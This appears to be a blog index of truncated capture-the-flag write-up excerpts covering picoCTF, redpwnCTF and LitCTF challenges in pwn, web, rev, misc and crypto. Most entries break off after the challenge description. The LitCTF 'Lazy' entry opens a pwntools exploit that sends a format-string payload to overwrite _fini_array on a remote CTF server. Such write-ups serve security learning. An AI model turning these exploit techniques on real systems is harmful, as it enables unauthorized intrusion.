picoCTF 2022 - Solfire - Pwn
This is a CTF Security challenge which involves exploiting a Solana on-chain program.
NOTE: This challenge is now part of the picoGym practice challenges
Points: 500
Category: Binary exploitation (pwn)
Challenge Author: Robert Chen (NotDeGhost)
Description
What is debt? A perversion of a promise?
Surely one has to pay one’s debts.
TL;...
redpwnCTF - Web
web/cool (125 solves / 122 points)
Description:
Aaron has a message for the cool kids. For support, DM BrownieInMotion.
cool.mc.ax
Downloads:
app.py
Solution:
Source code:
from flask import (
    Flask,
    request,
    render_template_string,
    session,
    redirect,
    send_file
)
from random import SystemRandom
impo...
redpwnCTF - Rev
bread-making (317 solves/108 points)
Description:
My parents aren’t home! Quick, help me make some bread please…
nc mc.ax 31796
bread
Solution:
Let’s open this up in Ghidra to see what it does. First things first, find the main func and read through all the strings. The main func is typically the first parameter in entry which is always labele...
redpwnCTF - Misc
misc (algo)/the-substitution-game (67 solves / 145 points)
Description:
nc mc.ax 31996
chall.py
Solution:
When we run this using python3, we get:
Welcome to The Substitution Game!
In each level, you will enter a list of string substitutions.
For example, you may want to change every instance of 'abcd' to 'def'.
The game will provide a series o...
redpwnCTF - Crypto
baby (827 solves/102 points)
Description:
I want to do an RSA! output.txt
Solution:
Right off the bat: RSA encryption time. Let’s open up the file and see what we have:
n: 228430203128652625114739053365339856393
e: 65537
c: 126721104148692049427127809839057445790
Wow, small N. Let’s use an integer factorization calculator.
Factoring n gives us p...
LitCTF - Web
web/LIT BUGS (92 solves / 129 points)
Description
Last year’s LIT platform may or may not have had some security vulnerabilities. We have created a simplified version of last year’s platform called LIT BUGS (Lexington Informatics Tournament’s Big Unsafe Grading System). The flag is the team name of the only registered user. Visit LIT BUGS here
D...
LitCTF - Pwn
pwn/Lazy
Annotated script:
from pwn import *
elf = ELF("lazy")
libc = ELF("libc-2.31.so")
#conn = elf.process()
conn = remote("lazy.litctf.live", 1337)
# overwrite _fini_array with main()
fini = 0x0000000004031c8
# overwrite char by char because we don't want to get huge chunks of text from the server
payload = b"%17c%12$hhn%47c%11$hhn%18c%13$hhnb...
LitCTF - Rev
rev/Evaluation (201 solves/112 points)
Description:
Here’s an evaluation copy of my flag checker! I hid the flag in the evaluation copy though…
print(eval(eval(eval(eval(eval(eval("''.join([chr(i) for i in [39,39,46,106,111,105,110,40,91,99,104,114,40,105,41,32,102,111,114,32,105,32,105,110,32,91,51,57,44,51,57,44,52,54,44,49,48,54,44,49,49,49,4...